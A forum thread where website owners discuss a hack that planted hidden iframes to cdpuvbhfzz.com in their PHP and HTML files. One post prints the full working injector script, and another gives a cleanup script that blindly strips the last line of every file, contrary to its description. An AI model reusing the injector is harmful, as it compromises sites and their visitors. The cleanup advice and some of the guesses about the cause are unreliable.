FRIHOST FORUMS SEARCH FAQ TOS BLOGS COMPETITIONS
You are invited to Log in or Register a free Frihost Account!


cdpuvbhfzz.com





truespeed
Has anyone elses site been hacked with a re-direct to this site? "cdpuvbhfzz.com" I have googled it and it seems to have happened to a lot of sites,attacking mainly forums and galleries,they have also managed to attack wordpress blogs.

All my files including the forum and gallery were affected,even my stand alone html pages were modified.

It plants an iframe in every php and html file at the bottom of the page.
tijn01
Yeeh that realy sucks man, I hope you figure out how to solve it. It hasn't happend to me yet, thank god for that!!
Good luck
Vrythramax
I am sorry for your hardship, but have you found anyway around this?
truespeed
Vrythramax wrote:
I am sorry for your hardship, but have you found anyway around this?


No,not really,from what i have read on the web,all you can do is either go into every file individually and remove the iframe,which when you have scripts,means you have a lot of files to edit,or just delete the files and upload the software files again,which is what i have done,luckily the databases werent affected as i didn't have those backed up.
Liu
Was this on frihost server? If so, then potentially all our websites may be at risk of being compromised.
truespeed
Liu wrote:
Was this on frihost server? If so, then potentially all our websites may be at risk of being compromised.


No it wasn't on frihost,and i have looked on my host forum,and so far nobody else seems to have been affected,so im not really sure how they are doing this as it has happened to too many people. I have other sites on the same server and none of these were affected,so its all a bit of a mystery as to how they are doing it.
Liu
There may be a vulnerability in the application creation process itself then - i.e. wordpress, and apps to create the galleries. The user forms that are directly handling database transactions, are they properly handling escape characters? If not, this could be a potential in sql injection attacks where one can easily get your credentials.
rvec
I am guessing the iframes are all the same, couldn't you just have use a search and replace?
In notepad++ you can search in all opened files (just open all affected files) and replace all the stuff by a space.
truespeed
rvec wrote:
I am guessing the iframes are all the same, couldn't you just have use a search and replace?
In notepad++ you can search in all opened files (just open all affected files) and replace all the stuff by a space.


I don't really know what you mean,or how i would do that,anyway its too late as i deleted the files.

Im stuck at the moment as i thought just re-uploading the the files again and putting in the database info into the config files would work,well they did with the phpbb forum,but im having problems with the coppermine gallery.

Hopefully i will be able to work it out as 100's of hours of work went into the gallery with over 7000 pictures that were uploaded into categories and named.

EDIT: I think i may have the wrong coppermine version,as i have just noticed they did a security update in february,im hoping thats it as i think i have the version i used on another PC.
missdixy
Wow, that sounds nasty :/ I'd never heard of that before.
Ghost Rider103
Do you have a forum at your website? If you do, make sure you only have one default skin through the template. As I know it is very possible to hack in from there, but by using only one default skin for the forum, it is much harder to do.

That sucks about what happend, hopefully it doesn't happen again.
truespeed
Ghost Rider103 wrote:
Do you have a forum at your website? If you do, make sure you only have one default skin through the template. As I know it is very possible to hack in from there, but by using only one default skin for the forum, it is much harder to do.

That sucks about what happend, hopefully it doesn't happen again.


Yeah i do have a forum,and yes i have a default skin,im back online with the forum,and have had no other attacks so far,but if they can gain entry once i know its a possibilty that they can do it again,with the forum, i am fully backed up though.
jmlworld
I know the cause of that weird redirection. A hidden VIRUS in your computer (not the host server) edits all the files ending .html, .php, .asp, and all web programming extensions files. The reason that virus edits those files is that when you upload your files to a SERVER (and then install it over there if required), the code redirects the whole website (or loads the page in side the iFrame which is really invisible because of the height and width in which the virus sets to a tinny value like height = 1px, width = 1px), whether the code redirects the whole page or part of it to cdpuvbhfzz.com the purpose of the redirection is to trick not only you but even the visitors of your site. Because cdpuvbhfzz.com may be a scum page or virus ridden which will make further stealth downloads of trojan and worms, also cdpuvbhfzz.com may involve with fraud and something like that, just tricky.

A site like this one existed in the year 2006 which was called krvkr.com which even had the ability to write melicious code into an audio file like REALPLAYER'S .ram files, however it looks as it's been expired or terminated these days.

Why not you scan your whole PC, and if you already did it, just switch your anti virus program to another one or just update it to the latest.
Ghost Rider103
truespeed wrote:
Ghost Rider103 wrote:
Do you have a forum at your website? If you do, make sure you only have one default skin through the template. As I know it is very possible to hack in from there, but by using only one default skin for the forum, it is much harder to do.

That sucks about what happend, hopefully it doesn't happen again.


Yeah i do have a forum,and yes i have a default skin,im back online with the forum,and have had no other attacks so far,but if they can gain entry once i know its a possibilty that they can do it again,with the forum, i am fully backed up though.


Well of course you have a default skin, but do you give the users the option to change that default skin to another? If so, that is probably where they are getting in from.
mentalist3d
Hi all

Just saw your posts and thought I would join the forum as I have been affected by this nuisance as well, however, I am running coppermine gallery and not any forum scripts.

You can get more information about the hack attack (coppermine specific) at: http://forum.coppermine-gallery.net/index.php/topic,51671.msg250825.html#msg250825

Check your hosting logs and you will probably see the time of the attack, for coppermine they were using the URI image upload function to exploit a weakness, within our server I found a file: 142739_298w3.zip which is actually a PHP file which seems to be changing folder permissions and attaching the i-frame code to all your pages, look for this file and remove it, disable user registrations etc for now.

Below is a script someone created to remove the extra lines of code from your site (This worked for a few people running coppermine including myself), you may need it modified to work with the forum, it will remove the affected code but the creator of the file (j_taubman) cannot guarantee that that there wont be any additional problems later.

killorcure.php

Code:
<?php
function fileExtension($file) {
    $fileExp = explode('.', $file);
    $filetype = $fileExp[count($fileExp)-1];
   
   return $filetype;
}

function parse($path) {
   $dir_array = array();
   if ($handle = opendir($path)) {
      while (false !== ($file = readdir($handle))) {
         if ($file != "." && $file != "..") {
            $try_dir = $path.$file.'/';
            if(is_dir($try_dir)) {
               array_push($dir_array, $try_dir);
            }
            else {
               if ($path[strlen($path)-1] != '/') {
                  $path.= '/';
               }
               $f_ext = fileExtension($file);
               if($f_ext=="php" || $f_ext=="html" || $f_ext=="htm") {
                  if($file!="debugger.inc.php") {
                     cutline($path.$file);
                  }
               }
            }
         }
      }
      closedir($handle);
   }
      
   return $dir_array;
}

function launch() {
   $total = 0;
   $last = 1;
   $last_num = 0;
   $path = $_SERVER['DOCUMENT_ROOT'];
   $dirs = array();
   array_push($dirs, $path);
   
   while($last) {
      $last_num = 0;
      for( $j=$total; $j<$total+$last; $j++) {
         $temp_dirs = parse($dirs[$j]);
         $last_t = sizeof($temp_dirs);
         $last_num += $last_t;
         for( $i=0; $i<$last_t; $i++) {
            array_push($dirs, $temp_dirs[$i]);
         }
      }
      $total += $last;
      $last = $last_num;      
   }
}
function cutline($filename,$line_no=-1) {

$strip_return=FALSE;

$data=file($filename);
$pipe=fopen($filename,'w');
$size=count($data);

if($line_no==-1) $skip=$size-1;
else $skip=$line_no-1;

for($line=0;$line<$size;$line++)
if($line!=$skip)
fputs($pipe,$data[$line]);
else
$strip_return=TRUE;

return $strip_return;
}
echo "~!";
launch();
?>


Upload the file to the server and run it only the once. Try and get someone to check the script here before using it just to make sure it is compatible.

Hope this helps
jmlworld
mentalist3d wrote:
Hi all

Just saw your posts and thought I would join the forum as I have been affected by this nuisance as well, however, I am running coppermine gallery and not any forum scripts.


Though this weird thing didn't attack me, I'm very happy with your kind contribution, man. I commented about this THREE POSTS above this replay, because I've experienced some behavors similar to this redirection which accured inside my localhost which effected even the PHPMYADMIN files and Joomla, WordPress and my own projects.

It looks as the writers of that thing used a double brain to attack certain scripts like Coppermine online. However my question is how "142739_298w3.zip" did manage to upload itself onto a webserver?! I think it went over there along a user submitted files.

Will someone taste the killorcure.php, please, so it will help more of us, and it will protect further hacks?

For mentalist3d, could you please make simple describtion of how "killorcure.php" will remove the weird code, please?
mentalist3d
Hi JMLworld

the script removes the i-frame code that was added to the bottom of every .php & .html page, I uploaded it to my server and then browsed to the page, you get a blank screen, after that I navigated back to my main page and the site was back to normal. I checked the code of several pages and the code was back to its normal state. The script seems to look for the specific i-frame code that was placed on the bottom of the pages and strip them out.

When the hacker got in with the zip file they seem to have uploaded a couple of images as well. The zip file is actually a disguised php script, changing the file extension from .zip to .php gives you this code:

Code:
<?php
function fileExtension($file) {
    $fileExp = explode('.', $file);
    $filetype = $fileExp[count($fileExp)-1];
   
   return $filetype;
}

function parse($path) {
   $dir_array = array();
   if ($handle = opendir($path)) {
      while (false !== ($file = readdir($handle))) {
         if ($file != "." && $file != "..") {
            $try_dir = $path.$file.'/';
            if(is_dir($try_dir)) {
               array_push($dir_array, $try_dir);
            }
            else {
               if ($path[strlen($path)-1] != '/') {
                  $path.= '/';
               }
               $f_ext = fileExtension($file);
               if($f_ext=="php" || $f_ext=="html" || $f_ext=="htm") {
                  if($file!="debugger.inc.php") {
                     //chmod($path.$file,0777);
                     $fhandle = fopen($path.$file, 'a+');
                     if($f_ext=="php") {
                        fwrite($fhandle, "<?php echo '<iframe src=\"http://cdpuvbhfzz.com/dl/adv598.php\" width=1 height=1></iframe>'; ?>");
                     }
                     else {
                        fwrite($fhandle, "<iframe src=\"http://cdpuvbhfzz.com/dl/adv598.php\" width=1 height=1></iframe>");
                     }
                     fclose($fhandle);
                  }
               }
            }
         }
      }
      closedir($handle);
   }
      
   return $dir_array;
}

function launch() {
   $total = 0;
   $last = 1;
   $last_num = 0;
   $path = $_SERVER['DOCUMENT_ROOT'];
   $dirs = array();
   array_push($dirs, $path);
   
   while($last) {
      $last_num = 0;
      for( $j=$total; $j<$total+$last; $j++) {
         $temp_dirs = parse($dirs[$j]);
         $last_t = sizeof($temp_dirs);
         $last_num += $last_t;
         for( $i=0; $i<$last_t; $i++) {
            array_push($dirs, $temp_dirs[$i]);
         }
      }
      $total += $last;
      $last = $last_num;      
   }
   $paths = $_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'];
   unlink($paths);
   
   if (is_file($paths)) {
      $fhandle = fopen($paths, 'w');
      fwrite($fhandle, "<?php echo'Upload plugins here'; ?>");
      fclose($fhandle);
   }
}

if (isset($_GET['ff']))
{
echo "~!";
launch();
}
echo '<iframe src=\"http://cdpuvbhfzz.com/dl/adv598.php\" width=1 height=1></iframe>';
?>


The script seems to change your chmod values so everything is writable and then adds the i-frame code to your pages. They got it onto my server by repeated registering accounts until one of the registrations were successful, they then uploaded the zip file which my gallery formerly allowed, and well my site got completely changed.
nivinjoy
Is it happening now also...?? Any information on that..??
truespeed
First of all ,i managed to get my gallery back up and running and updated to the latest version,in my haste to sort it out, i missed something as obvious as the updated coppermine prefix being different to my own.

jmlworld wrote:
I know the cause of that weird redirection. A hidden VIRUS in your computer (not the host server) edits all the files ending .html, .php, .asp, and all web programming extensions files. The reason that virus edits those files is that when you upload your files to a SERVER (and then install it over there if required), the code redirects the whole website (or loads the page in side the iFrame which is really invisible because of the height and width in which the virus sets to a tinny value like height = 1px, width = 1px), whether the code redirects the whole page or part of it to cdpuvbhfzz.com the purpose of the redirection is to trick not only you but even the visitors of your site. Because cdpuvbhfzz.com may be a scum page or virus ridden which will make further stealth downloads of trojan and worms, also cdpuvbhfzz.com may involve with fraud and something like that, just tricky.

A site like this one existed in the year 2006 which was called krvkr.com which even had the ability to write melicious code into an audio file like REALPLAYER'S .ram files, however it looks as it's been expired or terminated these days.

Why not you scan your whole PC, and if you already did it, just switch your anti virus program to another one or just update it to the latest.


I don't think its come from my PC,although i could be wrong,mainly because there are no infected html,php files on my pc,all the files were on my server.

mentalist3d wrote:
142739_298w3.zip


Thanks for pointing this out,i found this in the folder you said it would be,i never would of looked in there.
jmlworld
Mentalist3d,

Thanx, as I understood in the code, its seek and replace, if I'm not wrong, the code searches and replaces the iFrame.

TrueSpeed,

Hackers behave differently, they may attack even the secure servers. But I'm sure I had such attack on my LocalHost one year ago.
truespeed
They have just done my site again,for those with coppermine galleries,they have just done an update release,so i would advise anyone who has one to do the update as soon as possible.
Liu
Exactly -- fix the vulnerability first (updates), before actually trying to remove the inserted iframes. What's the use if you can't fix the root problem at hand.
truespeed
Liu wrote:
Exactly -- fix the vulnerability first (updates), before actually trying to remove the inserted iframes. What's the use if you can't fix the root problem at hand.


The update was only released yesterday,the problem with coppermine,unlike phpbb which tells you in your admin page when an update is released,is that unless you daily visit the site there is no way of knowing if an update is available.

Update on cdpuvbhfzz.com hack.

it now plants a jpg file in the userpics/10001 folder and makes a "Path to custom header include" to it in the gallery config.
Related topics
Reply to topic    Frihost Forum Index -> General -> General Chat

FRIHOST HOME | FAQ | TOS | ABOUT US | CONTACT US | SITE MAP
© 2005-2011 Frihost, forums powered by phpBB.